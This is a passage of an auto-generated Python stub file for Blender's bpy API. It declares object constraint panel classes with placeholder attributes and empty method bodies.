def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bLocLimitConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bLocateLikeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bLockTrackConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bMinMaxConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bObjectSolverConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bPivotConstraint(ObjectConstraintPanel, ConstraintButtonsPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bPythonConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bRotLimitConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bRotateLikeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class OBJECT_PT_bSameVolumeConstraint(ObjectConstraintPanel,
ConstraintButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_action(self, context):
'''
'''
pass
def draw_armature(self, context):
'''
'''
pass
def draw_camera_solver(self, context):
'''
'''
pass
def draw_childof(self, context):
'''
'''
pass
def draw_clamp_to(self, context):
'''
'''
pass
def draw_damp_track(self, context):
'''
'''
pass
def draw_dist_limit(self, context):
'''
'''
pass
def draw_follow_path(self, context):
'''
'''
pass
def draw_follow_track(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_influence(self, layout, con):
'''
'''
pass
def draw_kinematic(self, context):
'''
'''
pass
def draw_loc_limit(self, context):
'''
'''
pass
def draw_locate_like(self, context):
'''
'''
pass
def draw_lock_track(self, context):
'''
'''
pass
def draw_min_max(self, context):
'''
'''
pass
def draw_object_solver(self, context):
'''
'''
pass
def draw_pivot(self, context):
'''
'''
pass
def draw_python_constraint(self, _context):
'''
'''
pass
def draw_rot_limit(self, context):
'''
'''
pass
def draw_rotate_like(self, context):
'''
'''
pass
def draw_same_volume(self, context):
'''
'''
pass
def draw_shrinkwrap(self, context):
'''
'''
pass
def draw_size_like(self, context):
'''
'''
pass
def draw_size_limit(self, context):
'''
'''
pass
def draw_spline_ik(self, context):
'''
'''
pass
def draw_stretch_to(self, context):
'''
'''
pass
def draw_trackto(self, context):
'''
'''
pass
def draw_trans_like(self, context):
'''
'''
pass
def draw_transform(self, context):
'''
'''
pass
def draw_transform_cache(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def get_constraint(self, _context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def space_template(self, layout, con, target, owner, separator):
'''
'''
pass
def target_template(self, layout, con, subtargets):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
